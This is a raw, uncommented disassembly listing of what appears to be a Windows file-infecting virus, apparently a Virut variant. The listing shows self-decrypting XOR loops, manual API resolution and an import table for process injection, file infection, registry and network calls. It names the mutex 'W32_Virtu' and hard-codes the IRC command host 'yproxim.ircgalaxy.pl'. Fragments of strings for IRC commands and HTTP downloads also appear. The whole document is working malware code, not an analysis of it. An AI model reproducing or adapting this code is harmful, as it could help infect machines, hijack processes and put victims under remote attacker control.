dd 9B07FF2Fh, 0EAE91633h, 0FB8211CDh, 0A950D2AFh, 162D141Ah
dd 0FBC04E41h, 13811404h, 0D7059E5h, 53328C7Fh, 0E1694AFEh
dd 0BAA99053h, 793CCABDh, 0E04F230Ah, 1807616Eh, 0E47A08FBh
dd 0A21B8D9Ah, 0B85CA26Dh, 274789E1h, 64DD4E43h, 71411A96h
dd 0A027283Dh, 416751Eh, 0F10B26D2h, 5A4E3210h, 6361D3E1h
dd 0A0F45528h, 44B67E6Ah, 52A69AE7h, 0B7B92B38h, 0F64FD78Dh
dd 0E9EA5764h, 27CED11h, 9A4EC766h, 2E499E29h, 0BABFB0BCh
dd 7AF46672h, 24EED3C8h, 6E00727Eh, 0E369F6DBh, 0B2E51CA5h
dd 0A493440h, 0CE1241DEh, 709DA147h, 0F6F3631h, 0EA93449Bh
dd 6D35AB3Eh, 244688EAh, 9D23B024h, 0F8724B18h, 0D995F186h
dd 279E2032h, 8A1AFD2Fh, 0AD5CD448h, 626F2D21h, 7CF668FBh
dd 3CDF4B81h, 0F6A99490h, 0D666290Ah, 2BB13EB3h, 20652B10h
dd 7B8CDCh, 0C0EF086Eh, 0A1B36327h, 0F22DAF0Fh, 48A94650h
dd 0EE6F5B5Fh, 210C267Ch, 197606A2h, 0EF74395Ah, 0D5F03C6Dh
dd 0DDD54E58h, 0FA8B5F6Bh, 0F67C6891h, 78856368h, 0BEF5DED2h
dd 8146BB89h, 679AC049h, 7E59A0C4h, 8D072602h, 3DBC81Bh
dd 99138591h, 0C4E170CEh, 60D4C197h, 7BC54924h, 6283B730h
dd 0AF6B1A9Ch, 0BEA76B34h
dd 584DE7A8h, 59CD0AE4h, 0F73BEAF7h, 0A65FC28Ch, 92E73F1h
dd 993922DDh, 79E6FECCh, 0E267D9D5h, 7C00D3FFh, 4926FAEDh
dd 4F29AB86h, 7695ACABh, 93E038D4h, 8DEB6D44h, 38ABF295h
dd 0A59A0496h, 0B9AD2F02h, 0FA6DF657h, 0A8B1A58h, 0C1DA1EEEh
dd 730547AAh, 12B1988Fh, 8F845CB0h, 0B1C70968h, 0D477CE49h
dd 5546E872h, 0EF89CB25h, 9631A22Bh, 0A94A7134h, 0D27B9747h
dd 46D6F6E3h, 3D77E9C6h, 940D7F64h, 2BC94822h, 0E9184639h
dd 0A697417Eh, 94E016EBh, 7FB5D6Fh, 0D112C0D1h, 6E286958h
dd 75A857B8h, 0CB6E06D3h, 4E97169h, 7B0197E3h, 0EC7A84B1h
dd 0DBCC0D5Eh, 36BD4B05h, 0C3304F22h, 1D911F10h, 74FB8951h
dd 0C652278h, 0A504F4D7h, 4DC61DFDh, 46B4AEDBh, 0C0D9B8Eh
dd 2BCC713Eh, 8AAB1DADh, 0B0B4161Eh, 502CB499h, 14E25465h
dd 0FD1EBED0h, 180C818Bh, 7BA27EE5h, 66AD55E7h, 0D6CE7067h
dd 0D5E5DE27h, 0DDC55325h, 0DE130165h, 536F70A2h, 3B54D1C3h
dd 0BBAD3B2Dh, 709CE2ABh, 0B794F0FEh, 9C15A82Ch, 32BBF52Ah
dd 0E883B3C0h, 5EE7F156h, 0F785DFECh, 48037582h, 74140B3Ch
dd 98E2AD8Ah, 30C5CFC7h, 0E2B3ADC3h, 0F3F16370h, 53B7DD52h
dd 499C9517h, 3A830CD9h, 2FA60420h, 621D30A1h, 80h dup(0)
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
call sub_31432C1B
call sub_31432CA8
mov ebp, fs:0
add ebp, 8
jmp loc_31432C6A
; =============== S U B R O U T I N E =======================================
sub_31432C1B proc near ; CODE XREF: UPX2:31432C03�p
push dword ptr fs:0
mov fs:0, esp
xor ebx, ebx
push ebx
push ebx
push 100h
push ebx
push ebx
push ebx
push ebx
push 10h
push 80000000h
push 100h
call ds:dword_3142808C ; LoadLibraryA
xor ebx, ebx
push 4000h
push ebx
push ebx
push 4
push ebx
push 80000000h
push ebx
push 80000000h
push ebx
call ds:dword_3142808C ; LoadLibraryA
loc_31432C6A: ; CODE XREF: UPX2:31432C16�j
call $+5
pop ecx
sub ecx, 0FFFFFFBAh
xor edi, edi
or edi, 243Ch
mov ebx, 0D9h
push ecx
loc_31432C84: ; CODE XREF: sub_31432C1B+79�j
xchg al, [ecx]
xor ax, bx
mov [ecx], al
add ecx, 1
sub edi, 1
cmp edi, 0
jnz short loc_31432C84
pop ecx
mov esp, fs:0
pop dword ptr fs:0
leave
jmp ecx
sub_31432C1B endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_31432CA8 proc near ; CODE XREF: UPX2:31432C08�p
arg_C = dword ptr 10h
mov ecx, [esp+arg_C]
xor eax, eax
pop dword ptr [ecx+0B8h]
retn
sub_31432CA8 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 2
call $+5
mov eax, [esp]
test dword ptr [eax+242Bh], 80000000h
mov [eax+29ACh], ebx
mov ebx, [esp+4]
jz short loc_31432D01
cld
pop ecx
mov [eax+29B0h], esi
mov [eax+29B4h], edi
cmp byte ptr [eax+242Fh], 0E8h
jnz short loc_31432CF8
add ebx, [eax+2430h]
mov ebx, [ebx+2]
push dword ptr [ebx]
jmp short loc_31432D00
; ---------------------------------------------------------------------------
loc_31432CF8: ; CODE XREF: UPX2:31432CE9�j
mov ebx, [eax+2431h]
push dword ptr [ebx]
loc_31432D00: ; CODE XREF: UPX2:31432CF6�j
pop ebx
loc_31432D01: ; CODE XREF: UPX2:31432CD2�j
push ebp
xchg eax, ebp
sub dword ptr [esp+4], 1CBBh
and ebx, 0FFFFF000h
sub ebp, 401006h
mov edi, [esp+4]
lea esi, [ebp+40343Ch]
mov ecx, 0
rep movsb
loc_31432D28: ; CODE XREF: UPX2:31432D44�j
cmp dword ptr [ebx+4Eh], 73696854h
jnz short loc_31432D3E
mov eax, [ebx+3Ch]
lea eax, [eax+ebx]
cmp word ptr [eax], 4550h
jz short loc_31432D46
loc_31432D3E: ; CODE XREF: UPX2:31432D2F�j
sub ebx, 100h
jnz short loc_31432D28
loc_31432D46: ; CODE XREF: UPX2:31432D3C�j
mov edx, [eax+78h]
add edx, ebx
mov esi, [edx+20h]
mov ecx, [edx+18h]
add esi, ebx
push ecx
loc_31432D54: ; CODE XREF: UPX2:loc_31432D7B�j
lodsd
add eax, ebx
cmp dword ptr [eax-1], 74654700h
jnz short loc_31432D7B
cmp dword ptr [eax+3], 636F7250h
jnz short loc_31432D7B
cmp dword ptr [eax+7], 72646441h
jnz short loc_31432D7B
cmp dword ptr [eax+0Bh], 737365h
jz short loc_31432D80
loc_31432D7B: ; CODE XREF: UPX2:31432D5E�j
; UPX2:31432D67�j ...
loop loc_31432D54
pop ecx
pop ebp
retn
; ---------------------------------------------------------------------------
loc_31432D80: ; CODE XREF: UPX2:31432D79�j
sub [esp], ecx
mov esi, [edx+24h]
pop ecx
add esi, ebx
movzx eax, word ptr [esi+ecx*2]
mov edi, [edx+1Ch]
add edi, ebx
mov esi, [edi+eax*4]
add esi, ebx
call near ptr loc_31432DA6+2
inc ebx
insb
outsd
jnb short near ptr loc_31432E04+2
dec eax
popa
outsb
db 64h
insb
loc_31432DA6: ; CODE XREF: UPX2:31432D97�p
add gs:[ebx-1], dl
setalc
mov [ebp+40353Ch], eax
call near ptr loc_31432DC2+1
inc ebx
jb short near ptr loc_31432E1D+1
popa
jz short near ptr loc_31432E1D+4
inc ebp
jbe short near ptr loc_31432E23+1
outsb
jz short near ptr loc_31432E01+2
loc_31432DC2: ; CODE XREF: UPX2:31432DB1�p
add [ebx-1], dl
setalc
mov [ebp+403540h], eax
call sub_31432DDE
inc edi
db 65h
jz short near ptr loc_31432E1D+4
popa
jnb short loc_31432E4C
inc ebp
jb short near ptr loc_31432E4C+1
outsd
jb short $+2
; =============== S U B R O U T I N E =======================================
sub_31432DDE proc near ; CODE XREF: UPX2:31432DCC�p
; FUNCTION CHUNK AT 31432E87 SIZE 000000B1 BYTES
; FUNCTION CHUNK AT 31432FC7 SIZE 0000013A BYTES
push ebx
call esi ; lstrcatA
mov [ebp+403544h], eax
call sub_31432E5C
test eax, eax
jz short loc_31432E11
push eax
call dword ptr [ebp+403544h]
test eax, eax
jnz short loc_31432E0B
lea eax, [ebp+4011D2h]
loc_31432E01: ; CODE XREF: UPX2:31432DC0�j
mov dl, [eax-1]
loc_31432E04: ; CODE XREF: UPX2:31432D9F�j
call sub_31432E77
jmp short loc_31432E87
; ---------------------------------------------------------------------------
loc_31432E0B: ; CODE XREF: sub_31432DDE+1B�j
; sub_31432DDE+136�j ...
call dword ptr [ebp+40353Ch]
loc_31432E11: ; CODE XREF: sub_31432DDE+10�j
test dword ptr [ebp+403431h], 80000000h
jz short loc_31432E3B
loc_31432E1D: ; CODE XREF: UPX2:31432DB7�j
; UPX2:31432DBA�j ...
lea esi, [ebp+403435h]
loc_31432E23: ; CODE XREF: UPX2:31432DBD�j
mov edi, [esp+4]
movsb
movsd
mov ebx, [ebp+4039B2h]
mov esi, [ebp+4039B6h]
mov edi, [ebp+4039BAh]
loc_31432E3B: ; CODE XREF: sub_31432DDE+3D�j
pop ebp
retn
sub_31432DDE endp
; ---------------------------------------------------------------------------
loc_31432E3D: ; CODE XREF: sub_31432E5C+2�p
; sub_31432DDE:loc_31433046�p
pop edx
push 0
push 0
push 0
push 0
push 40001h
; ---------------------------------------------------------------------------
db 8Bh
; ---------------------------------------------------------------------------
loc_31432E4C: ; CODE XREF: UPX2:31432DD6�j
; UPX2:31432DD9�j
les ebp, [edx+0]
push eax
push 0Ch
mov eax, esp
jmp edx
; ---------------------------------------------------------------------------
aVt_3 db 'VT_3',0
align 4
; =============== S U B R O U T I N E =======================================
sub_31432E5C proc near ; CODE XREF: sub_31432DDE+9�p
; UPX2:loc_31433B01�p
xor ecx, ecx
call loc_31432E3D
lea edx, [ebp+4011A1h]
push edx
push ecx
push ecx
push eax
call dword ptr [ebp+403540h]
add esp, 20h
retn
sub_31432E5C endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_31432E77 proc near ; CODE XREF: sub_31432DDE:loc_31432E04�p
; sub_31434C4B+25B�p
mov dh, dl
mov ecx, 225Fh
loc_31432E7E: ; CODE XREF: sub_31432E77+C�j
xor [eax], dl
inc eax
add dl, dh
loop loc_31432E7E
retn
sub_31432E77 endp
; ---------------------------------------------------------------------------
pop esi
; START OF FUNCTION CHUNK FOR sub_31432DDE
loc_31432E87: ; CODE XREF: sub_31432DDE+2B�j
and dword ptr [ebp+401580h], 0
and dword ptr [ebp+401584h], 0
and dword ptr [ebp+401588h], 0
mov eax, [ebp+403431h]
xor ecx, ecx
push 1
mov cl, 20h
pop dword ptr [ebp+40397Eh]
loc_31432EAE: ; CODE XREF: sub_31432DDE+E0�j
xor edx, edx
shr eax, 1
setb dl
shl dl, 3
add [ebp+40397Eh], edx
loop loc_31432EAE
push edi
mov byte ptr [ebp+401303h], 1
mov [ebp+403548h], esi
lea esi, [ebp+4015BBh]
xor ecx, ecx
lea edi, [ebp+403558h]
mov cl, 1Eh
call sub_31433241
pop edi
call dword ptr [ebp+403594h]
shr eax, 1Fh
jz loc_31432FC7
mov eax, [edi+14h]
push 40h
add eax, ebx
push 8001000h
mov [ebp+403550h], eax
push 69CEh
push 0
call dword ptr [ebp+4035C8h]
test eax, eax
jz loc_31432E0B
xchg eax, edi
lea esi, [ebp+401000h]
mov ebp, edi
mov ecx, 0A74h
sub ebp, 401000h
lea edx, [ebp+401283h]
rep movsd
jmp edx
; END OF FUNCTION CHUNK FOR sub_31432DDE
; ---------------------------------------------------------------------------
sub esp, 20h
mov edi, esp
push 8
xor eax, eax
pop ecx
lea edx, [ebp+401A3Dh]
rep stosd
mov edi, esp
mov [edi+10h], edx
inc byte ptr [edi+1Ch]
push edi
push 10003h
call dword ptr [ebp+403550h]
add esp, 20h
test eax, eax
jz loc_31432E0B
xchg eax, edi
push 0
push 1
push 80000400h
push 10000h
call dword ptr [ebp+403550h]
test eax, eax
jz loc_31432E0B
push 0
push eax
push 40000h
push 0
shr eax, 0Ch
push edi
push 1
push eax
push 10001h
call dword ptr [ebp+403550h]
push 1000Ah
call dword ptr [ebp+403550h]
call sub_31432FB7
jmp loc_31432E0B
; =============== S U B R O U T I N E =======================================
sub_31432FB7 proc near ; CODE XREF: UPX2:31432FAD�p
; sub_31432FB7+D�j
push 1
pop ecx
jecxz short locret_31432FC6
push 0Ah
call dword ptr [ebp+4035BCh]
jmp short sub_31432FB7
; ---------------------------------------------------------------------------
locret_31432FC6: ; CODE XREF: sub_31432FB7+3�j
retn
sub_31432FB7 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_31432DDE
loc_31432FC7: ; CODE XREF: sub_31432DDE+10F�j
cmp dword ptr [ebp+403570h], 0
jz loc_31432E0B
call near ptr loc_31432FDE+1
dec esi
push esp
inc esp
dec esp
dec esp
loc_31432FDE: ; CODE XREF: sub_31432DDE+1F6�p
add bh, bh
xchg eax, ebp
mov ds:0B58D0040h, dh
jnb short near ptr loc_31432FFB+5
inc eax
add [ebx], dh
leave
lea edi, [ebp+4035D0h]
mov cl, 0Bh
xchg eax, ebx
call sub_31433241
loc_31432FFB: ; CODE XREF: sub_31432DDE+209�j
cmp dword ptr [ebp+4035F8h], 0
jz loc_31432E0B
mov eax, [ebp+4035D4h]
push dword ptr [eax+1]
pop dword ptr [ebp+403395h]
mov eax, [ebp+4035E8h]
push dword ptr [eax+1]
pop dword ptr [ebp+4033E2h]
mov eax, [ebp+4035D8h]
push dword ptr [eax+1]
pop dword ptr [ebp+4033E9h]
mov ecx, [ebp+4035DCh]
jecxz short loc_31433046
push dword ptr [ecx+1]
pop dword ptr [ebp+4033F6h]
loc_31433046: ; CODE XREF: sub_31432DDE+25D�j
call loc_31432E3D
lea edi, [ebp+40364Eh]
mov ecx, edi
push 0
neg cl
push dword ptr [eax+4]
and ecx, 3
push 40h
add edi, ecx
push edi
push 0
push 18h
lea esi, [ebp+40159Fh]
mov ecx, 1Ch
mov edx, esp
lea eax, ds:0FFFFFFFEh[ecx*2]
stosw
lea eax, ds:0[ecx*2]
stosw
lea eax, [edi+4]
stosd
xor ah, ah
loc_3143308B: ; CODE XREF: sub_31432DDE+2B0�j
lodsb
stosw
loop loc_3143308B
push 0
push 69CEh
mov ecx, esp
push 0
mov eax, esp
push 0
push 8000000h
push 40h
push ecx
push edx
push 0Eh
push eax
call dword ptr [ebp+4035E0h]
pop eax
add esp, 40h
push 69CEh
mov edx, esp
push 0
mov ecx, esp
push 40h
push 0
push 2
push edx
push 0
push 69CEh
push 0
push ecx
push 0FFFFFFFFh
push eax
call dword ptr [ebp+4035E4h]
pop edi
pop ecx
test edi, edi
jz loc_31432E0B
lea esi, [ebp+401000h]
mov ecx, 0A74h
mov ebp, edi
rep movsd
sub ebp, 401000h
lea eax, [ebp+40144Ch]
jmp eax
; END OF FUNCTION CHUNK FOR sub_31432DDE
; ---------------------------------------------------------------------------
db 8Dh, 95h, 0E0h
db 18h
db 40h, 0, 52h
db 0FFh
db 95h, 9Ch, 35h
db 40h ; @
align 2
dw 16E8h
db 0
db 2 dup(0), 4Ch
aOokupprivilege db 'ookupPrivilegeValueA',0
db 50h, 0FFh, 95h
dd 403548h, 354C8589h, 54500040h, 0FF6A206Ah, 35EC95FFh
dd 0C0850040h, 963F755Fh, 5656026Ah, 16AD48Bh, 11E852h
dd 65530000h, 75626544h, 69725067h, 656C6976h, 56006567h
dd 354C95FFh, 0C48B0040h, 50565656h, 95FF5756h, 4035D0h
dd 5710C483h, 353C95FFh, 6A0040h, 95FF026Ah, 403570h, 128B9h
dd 0E12B9700h, 54240C89h, 0AC95FF57h, 33004035h, 3CA583F6h
dd 4036h, 95FF5754h, 4035B0h, 5C74C085h, 4FE8346h, 74FFEE72h
dd 6A0824h, 95FF2A6Ah, 4035A8h, 0DC74C085h, 43DE893h, 0C9330000h
dd 3930E391h, 40363C85h, 81287500h, 0DAEC1h, 50545000h
dd 50505156h, 6895FF53h, 85004035h, 0F7459C0h, 82474FFh
dd 363C858Fh, 0ACE80040h, 53FFFFFDh, 353C95FFh, 98EB0040h
dd 128C481h, 0FF570000h, 40353C95h, 0FBE5E900h, 498DFFFFh
dd 58585800h, 29CE00h, 0D6500h, 3 dup(0)
db 0
; =============== S U B R O U T I N E =======================================
sub_31433241 proc near ; CODE XREF: sub_31432DDE+100�p
; sub_31432DDE+218�p ...
push ecx
push esi
push ebx
call dword ptr [ebp+403548h]
stosd
pop ecx
loc_3143324C: ; CODE XREF: sub_31433241+E�j
lodsb
test al, al
jnz short loc_3143324C
loop sub_31433241
retn
sub_31433241 endp
; ---------------------------------------------------------------------------
aBasenamedobjec db '\BaseNamedObjects\W32_Virtu',0
aLstrlen db 'lstrlen',0
aCreatefilea db 'CreateFileA',0
aCreatefilemapp db 'CreateFileMappingA',0
aCreateprocessa db 'CreateProcessA',0
aCreateremote_0 db 'CreateRemoteThread',0
aCreatethread db 'CreateThread',0
aCreatetoolhelp db 'CreateToolhelp32Snapshot',0
aExitthread db 'ExitThread',0
aFiletimetosyst db 'FileTimeToSystemTime',0
aGetfileattribu db 'GetFileAttributesA',0
aGetfilesize db 'GetFileSize',0
aGetfiletime db 'GetFileTime',0
aGetmodulehandl db 'GetModuleHandleA',0
aGettempfilenam db 'GetTempFileNameA',0
aGettemppatha db 'GetTempPathA',0
aGetversion db 'GetVersion',0
aGetversionexa db 'GetVersionExA',0
aLoadlibrarya db 'LoadLibraryA',0
aMapviewoffile db 'MapViewOfFile',0
aOpenfilemappin db 'OpenFileMappingA',0
aOpenprocess db 'OpenProcess',0
aProcess32first db 'Process32First',0
aProcess32next db 'Process32Next',0
aSetfileattribu db 'SetFileAttributesA',0
aSetfiletime db 'SetFileTime',0
aSleep db 'Sleep',0
aSystemtimetofi db 'SystemTimeToFileTime',0
aUnmapviewoffil db 'UnmapViewOfFile',0
aVirtualalloc db 'VirtualAlloc',0
aWritefile db 'WriteFile',0
aNtadjustprivil db 'NtAdjustPrivilegesToken',0
aNtcreatefile db 'NtCreateFile',0
aNtcreateproces db 'NtCreateProcess',0
aNtcreateproc_0 db 'NtCreateProcessEx',0
aNtcreatesectio db 'NtCreateSection',0
aNtmapviewofsec db 'NtMapViewOfSection',0
aNtopenfile db 'NtOpenFile',0
aNtopenprocesst db 'NtOpenProcessToken',0
aNtprotectvirtu db 'NtProtectVirtualMemory',0
aNtwritevirtual db 'NtWriteVirtualMemory',0
aRtlunicodestri db 'RtlUnicodeStringToAnsiString',0
aWsastartup db 'WSAStartup',0
aClosesocket db 'closesocket',0
aConnect db 'connect',0
aGethostbyname db 'gethostbyname',0
aRecv db 'recv',0
aSend db 'send',0
aSocket db 'socket',0
aInternetcloseh db 'InternetCloseHandle',0
aInternetgetcon db 'InternetGetConnectedState',0
aInternetopena db 'InternetOpenA',0
aInternetopenur db 'InternetOpenUrlA',0
aInternetreadfi db 'InternetReadFile',0
aAdvapi32_dll db 'ADVAPI32.DLL',0
aRegclosekey db 'RegCloseKey',0
aRegopenkeyexa db 'RegOpenKeyExA',0
aRegqueryvaluee db 'RegQueryValueExA',0
aRegsetvalueexa db 'RegSetValueExA',0
; =============== S U B R O U T I N E =======================================
sub_314335DC proc near ; CODE XREF: sub_31433613+70�p
; sub_31433613+81�p ...
var_5 = byte ptr -5
sub ecx, 5
sub ecx, eax
push ecx
push 0E8000000h
lea ecx, [esp+8+var_5]
push 0
push 5
push ecx
push eax
push ebx
push 5
mov ecx, esp
push eax
mov edx, esp
push eax
push esp
push 40h
push ecx
push edx
push ebx
call dword ptr [ebp+4035F0h]
add esp, 0Ch
call dword ptr [ebp+4035F4h]
add esp, 8
retn
sub_314335DC endp
; =============== S U B R O U T I N E =======================================
sub_31433613 proc near ; CODE XREF: UPX2:314350D5�p
push edi
lea eax, [ebp+4015B1h]
xor edi, edi
push eax
push 0
push 0Eh
call dword ptr [ebp+4035A4h]
test eax, eax
jz loc_314336BF
push eax
push 69CEh
mov edx, esp
push 0
mov ecx, esp
push 40h
push 100000h
push 2
push edx
push 0
push 69CEh
push 0
push ecx
push ebx
push eax
call dword ptr [ebp+4035E4h]
pop edi
pop ecx
call dword ptr [ebp+40353Ch]
test edi, edi
jz short loc_314336BF
mov ecx, [ebp+401588h]
jecxz short loc_31433677
lea edx, [ebp+401000h]
add edx, ecx
push edi
push ebx
call edx
loc_31433677: ; CODE XREF: sub_31433613+56�j
mov eax, [ebp+4035D4h]
lea ecx, [edi+2394h]
call sub_314335DC
mov eax, [ebp+4035E8h]
lea ecx, [edi+23E1h]
call sub_314335DC
mov eax, [ebp+4035D8h]
lea ecx, [edi+23E8h]
call sub_314335DC
mov eax, [ebp+4035DCh]
test eax, eax
jz short loc_314336BF
lea ecx, [edi+23F5h]
call sub_314335DC
loc_314336BF: ; CODE XREF: sub_31433613+16�j
; sub_31433613+4E�j ...
mov eax, edi
pop edi
retn
sub_31433613 endp
; ---------------------------------------------------------------------------
push ebp
call $+5
pop ebp
sub ebp, 401A14h
xor ecx, ecx
lea eax, [ebp+401DAEh]
push ecx
push esp
push ecx
push ecx
push eax
push ecx
push ecx
call dword ptr [ebp+40356Ch]
xchg eax, [esp]
call dword ptr [ebp+40353Ch]
pop ebp
retn 4
; ---------------------------------------------------------------------------
dw 0E855h
align 8
dd 43ED815Dh, 6A00401Ah, 0E958DFFh, 5000401Ah, 2420CD52h
dd 83002A00h, 0C7660CC4h, 401A5485h, 0C720CD00h, 401A5685h
dd 2A002400h, 6AC35D00h, 0FF016A01h, 473FF33h, 0C08515FFh
dd 0B68F074h, 8B000000h, 50035BD0h, 72B58D3Ch, 8B00401Ah
dd 10CBAh, 88A8B00h, 3000001h, 60CB2BF8h, 0A6F3CB8Bh, 47057461h
dd 0C2EBF5E2h, 570FC783h, 8B53D48Bh, 6A5450CCh, 6A525140h
dd 0F095FFFFh, 83004035h, 958B0CC4h, 403574h, 0EA83D72Bh
dd 6A07C707h, 8900E800h, 6AC30357h, 9E8581Ah, 8D000000h
dd 0FEAA6142h, 0C3F075C9h
; =============== S U B R O U T I N E =======================================
sub_314337A4 proc near ; CODE XREF: sub_3143400F+1B�p
; sub_31434187+3�p ...
imul edx, [ebp+403646h], 8088405h
inc edx
mov [ebp+403646h], edx
mul edx
retn
sub_314337A4 endp
; ---------------------------------------------------------------------------
dd 0E855h, 815D0000h, 401B09EDh, 4A9D8B00h, 83004036h
dd 8247Ch, 0B9840Fh, 0EC810000h, 208h, 1046854h, 95FF0000h
dd 403590h, 848DFC8Bh, 10424h, 6A5000h, 4E8h, 54525600h
dd 95FF5700h, 40358Ch, 978DC933h, 104h, 26A5151h, 68016A51h
dd 40000000h, 5C95FF52h, 96004035h, 5B74F685h, 4685450h
dd 57000001h, 2024B4FFh, 0FF000002h, 40362895h, 0C0855900h
dd 14E31674h, 6AD48B50h, 57515200h, 0CC95FF56h, 59004035h
dd 0D075C085h, 3C95FF56h, 8D004035h, 57524457h, 8D58446Ah
dd 10497h, 0C033AB00h, 0F359106Ah, 505050ABh, 50505050h
dd 6495FF52h, 81004035h, 208C4h, 2474FF00h, 1895FF08h
dd 53004036h, 361895FFh, 0C25D0040h, 3E800004h, 4601750Ah
dd 15848D8Bh, 19E30040h, 1000958Dh, 0D1030040h, 84D2FF56h
dd 1F880FC0h, 0F000001h, 11084h, 3A3E8000h, 80461075h
dd 840F003Eh, 101h, 75203E80h, 3E8146F1h, 474E4950h, 0CF8B4275h
dd 4F0146C6h, 6A51CE2Bh, 53565100h, 361095FFh, 3B590040h
dd 0DF850FC1h, 8D000000h, 401DA285h, 68006A00h, 0Ch, 95FF5350h
dd 403610h, 0C3Dh, 0BF850F00h, 0E9000000h, 0B1h, 52503E81h
dd 850F5649h, 0A5h, 0AC08C683h, 840F0D3Ch, 99h, 0F375203Ch
dd 0F3A3CACh, 8C85h, 200DAD00h, 3D202020h, 74656721h, 3CAC7F75h
dd 817C7520h, 6820FF7Eh, 71757474h, 70037E81h, 752F2F3Ah
dd 0FF47C668h, 0BA310F00h, 2710h, 0FF52E2F7h, 4035BC95h
dd 50C03300h, 0E8505050h, 9, 6E776F44h, 64616F6Ch, 2095FF00h
dd 85004036h, 333674C0h, 4A8589C9h, 51004036h, 20068h
dd 56515180h, 2495FF50h, 8D004036h, 401B0395h, 0C9335000h
dd 52505154h, 95FF5151h, 40356Ch, 0FF240487h, 40353C95h
dd 80C3F800h, 4015778Dh, 0C3F90100h
aSoftwareMicr_1 db 'SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer',0
aTargethost db 'TargetHost',0
dw 2
db 0FFh
db 0F0h, 73h, 7Eh
db 2
aYproxim_ircgal db 'yproxim.ircgalaxy.pl',0
; ---------------------------------------------------------------------------
dec esi
dec ecx
inc ebx
dec ebx
and [ebp+69h], ch
push 6B696F6Ch
push 4553550Ah
push edx
and [ecx+30h], bh
xor dh, [eax]
xor eax, 2E203130h
and [esi], ch
and [edx], bh
sub eax, 4E494F4Ah
and [esi], ah
jbe short near ptr loc_31433AC7+1
jb short near ptr loc_31433AD4+1
jnz short near ptr loc_31433A6A+3
push ebp
call $+5
pop ebp
loc_31433A6A: ; CODE XREF: UPX2:31433A61�j
sub ebp, 401DB4h
mov byte ptr [ebp+401577h], 0
call dword ptr [ebp+403594h]
shr eax, 1Fh
jz short loc_31433ABE
push 1Eh
mov esi, [ebp+403550h]
pop ecx
loc_31433A8B: ; CODE XREF: UPX2:loc_31433ABA�j
lodsb
cmp al, 2Eh
jnz short loc_31433ABA
cmp word ptr [esi], 1DFFh
jnz short loc_31433ABA
lea edi, [ebp+403640h]
mov esi, [esi+2]
push edi
movsd
movsw
lea eax, [ebp+40336Ah]
pop dword ptr [ebp+403390h]
cli
mov [esi-6], eax
mov word ptr [esi-2], cs
sti
mov cl, 1
loc_31433ABA: ; CODE XREF: UPX2:31433A8E�j
; UPX2:31433A95�j
loop loc_31433A8B
jmp short loc_31433B01
; ---------------------------------------------------------------------------
loc_31433ABE: ; CODE XREF: UPX2:31433A80�j
lea eax, [ebp+4015B1h]
push eax
push 0
loc_31433AC7: ; CODE XREF: UPX2:31433A5D�j
push 0Eh
call dword ptr [ebp+4035A4h]
cmp dword ptr [esp+8], 4
loc_31433AD4: ; CODE XREF: UPX2:31433A5F�j
jnz short loc_31433B01
call near ptr loc_31433ADE+1
push ebx
inc esi
inc ebx
loc_31433ADE: ; CODE XREF: UPX2:31433AD6�p
add bh, bh
xchg eax, ebp
mov ds:48E80040h, dh
cld
; ---------------------------------------------------------------------------
dd 7E8FFFFh, 53000000h, 4F5F4346h, 95FF0053h, 403588h
dd 0FFFC31E8h
db 0FFh
; ---------------------------------------------------------------------------
loc_31433B01: ; CODE XREF: UPX2:31433ABC�j
; UPX2:loc_31433AD4�j
call sub_31432E5C
dec dword ptr [ebp+401303h]
call near ptr loc_31433B1B+1
push ebp
push ebx
inc ebp
push edx
xor esi, [edx]
db 2Eh
inc esp
dec esp
dec esp
loc_31433B1B: ; CODE XREF: UPX2:31433B0C�p
add bh, bh
xchg eax, ebp
pushf
xor eax, 0AE80040h
; ---------------------------------------------------------------------------
dd 77000000h, 69727073h, 4166746Eh, 95FF5000h, 403548h
dd 35548589h, 310F0040h, 18E08D8Dh, 85890040h, 403646h
dd 9C95FF51h, 93004035h, 468h, 0EDB58D00h, 59004018h, 362CBD8Dh
dd 0D6E80040h, 66FFFFF6h, 1D6785C7h, 0F0FF0040h, 1D69A583h
dd 8D000040h, 401D2795h, 6A545000h, 52006A01h, 268h, 3095FF80h
dd 85004036h, 22755AC0h, 1D5A8D8Dh, 6A520040h, 67B58D06h
dd 5400401Dh, 51505056h, 3495FF52h, 58004036h, 362C95FFh
dd 85C60040h, 40384Dh, 0CE800h, 53570000h, 334B434Fh, 4C442E32h
dd 95FF004Ch, 40359Ch, 76893h, 0B58D0000h, 401844h, 0FCBD8D59h
dd 0E8004035h, 0FFFFF651h, 0CE8h, 4E495700h, 54454E49h
dd 4C4C442Eh, 9C95FF00h, 85004035h, 0E7840FC0h, 93000001h
dd 568h, 82B58D00h, 59004018h, 3618BD8Dh, 1AE80040h, 83FFFFF6h
dd 40361CBDh, 840F0000h, 1C2h, 190EC81h, 68540000h, 101h
dd 35FC95FFh, 0C4810040h, 190h, 6AD48B50h, 95FF5200h, 40361Ch
dd 7559C085h, 1388680Dh, 95FF0000h, 4035BCh, 0BD83E2EBh
dd 401D69h, 8D297500h, 401D6D85h, 95FF5000h, 403608h, 840FC085h
dd 13Bh, 8B0C408Bh, 8F30FF00h, 401D6985h, 4D85C600h, 1004038h
dd 16A006Ah, 95FF026Ah, 403614h, 0FFFF883h, 11284h, 958D9300h
dd 401D65h, 5352106Ah, 360495FFh, 0C0850040h, 0F2850Fh
dd 0BD8D0000h, 401D86h, 0BCE808B1h, 68FFFFFAh, 94h, 89E62B5Eh
dd 0FF542434h, 40359895h, 94BD8D00h, 0B100401Dh, 0FA9DE801h
dd 448BFFFFh, 0E0C11024h, 24440B08h, 8E0C104h, 824440Bh
dd 5E850h, 2E250000h, 57007836h, 355495FFh, 0C4830040h
dd 647C60Ch, 81958D20h, 6A00401Dh, 216800h, 53520000h
dd 361095FFh, 7C8D0040h, 0FF571424h, 40355895h, 3804C600h
dd 6A400Ah, 0FF535750h, 40361095h, 8DE60300h, 401DA2BDh
dd 68006A00h, 0Ch, 95FF5357h, 403610h, 0C3Dh, 8D4D7500h
dd 40364EB5h, 4D8D8D00h, 2B004038h, 51006ACEh, 95FF5356h
dd 40360Ch, 7E00F883h, 0FE8B912Fh, 364EB58Dh, 0DB00040h
dd 1075AEF2h, 0FAF8E860h, 7261FFFFh, 8D09E317h, 0EAEB0177h
